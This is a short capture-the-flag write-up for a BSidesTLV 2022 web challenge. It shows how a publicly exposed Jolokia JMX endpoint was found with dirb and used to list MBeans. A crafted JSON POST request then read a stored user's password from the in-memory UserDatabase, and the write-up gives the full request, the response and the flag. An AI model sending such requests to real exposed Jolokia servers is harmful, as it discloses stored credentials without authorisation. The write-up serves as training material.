Tags: web
Rating:
Running dirb on the provided list reveals jolokia JMX is public
After reading how this works:
going to https://not-found.ctf.bsidestlv.com/jolokia/list - reveals all mbeans are available for usage.
Searching there reveals users are stored in memory mbean:
`Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\""`
There is a user with a username=BSidesTLV2022 and a role: k1aNoYouCantBruteIt} which looks like part of the flag.
Ok another part is missing. lets try to read the user password by a post request which reads from this mbean:
```
POST
https://not-found.ctf.bsidestlv.com/jolokia/
{
"type" : "read",
"mbean" : "Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"",
"operation": "findUser",
"arguments": ["BSidesTLV2022"],
"attribute" : "password"
}
```
Reveals the second missing part:
`{"timestamp":1656402372,"status":200,"request":{"mbean":"Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"","attribute":"password","type":"read"},"value":"{J0l0k1aJ0l0k1aJ0l0"}`